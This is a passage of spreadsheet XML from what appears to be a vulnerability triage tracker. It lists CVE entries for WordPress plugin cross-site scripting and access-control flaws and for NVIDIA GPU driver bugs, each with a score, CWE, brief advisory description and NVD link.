          <t>CVE-2026-97239</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr"/>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in MCP Content Manager Lite &lt;= 1.1.0 versions.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97239</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97247</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Blocksy Companion &lt;= 2.1.55 versions.</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97247</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97262</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Visual Composer Website Builder &lt;= 45.16.2 versions.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97262</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97265</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock. Jetimpex Inc. JetEngine allows Stored XSS.
This issue affects JetEngine: from n/a through 3.8.15.3.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97265</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97266</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Virtue/Ascend/Pinnacle Toolkit &lt;= 4.9.12.1 versions.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97266</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97270</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in CMB2 &lt;= 2.13.0 versions.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97270</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97279</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Polylang &lt;= 3.8.9 versions.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97279</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97286</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Strong Testimonials &lt;= 3.3.11 versions.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97286</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97288</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in OAuth Server &lt;= 4.5.1 versions.</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97288</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97292</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>Author Cross Site Scripting (XSS) in YITH WooCommerce Tab Manager &lt;= 2.15.0 versions.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97292</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97298</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in King Addons for Elementor &lt;= 51.1.86 versions.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97298</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97301</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="inlineStr"/>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Cool Formkit Lite &lt;= 2.7.8 versions.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97301</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14564</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>The Viable URL Media Uploader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T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14564</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11895</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>The HT Mega Addons for Elementor – Elementor Widgets &amp; Template Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Data Table 'display_options' Setting in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11895</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14876</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>The Smart Slider 3 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-href' parameter in all versions up to, and including, 3.5.1.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14876</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47565</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a privileged user could trigger a race condition that leads to an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47565</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47586</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel module where an attacker could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47586</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6170</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr">
